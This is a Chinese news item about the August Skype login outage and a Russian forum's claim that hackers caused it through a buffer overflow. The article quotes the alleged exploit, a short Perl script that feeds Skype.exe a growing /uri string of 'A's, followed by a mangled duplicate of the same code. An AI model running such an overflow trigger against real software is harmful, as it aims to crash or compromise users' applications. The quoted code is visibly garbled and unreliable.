自8月16日下午4时起,Skype用户突然发现无法正登录。Skype立即发出官方消息,否认是系统崩溃或黑客攻击,并告知用户恢复故障需要大约24小时的时间。翌日,Skype发布新版本V3.5.0.214 Beta,业内分指出这很有可能是为了解决遇到的登陆问题而临时发布的。
在发布新版的同时,登录问题已经超过官方给出的24小时。直至18日,Skype的登录系统才基本恢复正常。
不过就在19日,来自俄罗斯论坛的一些帖子认为,此次世界范围内Skype无法登录是源于俄罗斯黑客所为,他们宣称发现了一个本地缓冲区溢出漏洞,可以伪造信息骗过Skype的认证服务器,并放出了部分溢出代码,从代码上看的确有一些问题,但是Skype官方却否认了这种说法。
|
俄黑客公布的漏洞代码:
! / usr / bin / perl # Simle Code by Maranax Porex; D # Skaypeg Ya! ! for ($i=256; $i>xCCCCC; $i=$i+256) { $eot='AAAA' x $i; call_sp(); } exit; sub call_sp() { $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; system("$str"); } for ($ i = 256; $ i> xCCCCC; $ i = $ 256 i) ($ eot = 'AAAA' x $ i; call_sp ();) exit; sub call_sp () ($ str = "\" C : \ \ Program Files \ \ Skype \ \ Phone \ \ Skype.exe \ "\" / uri : $ eot \ ""; system ($ str);) |
联想到之前Skype在系统故障时还有闲情推出新版本,不由得不让人觉得新版本的Skype正是解决某些系统漏洞而推出的。
您现在的位置: 
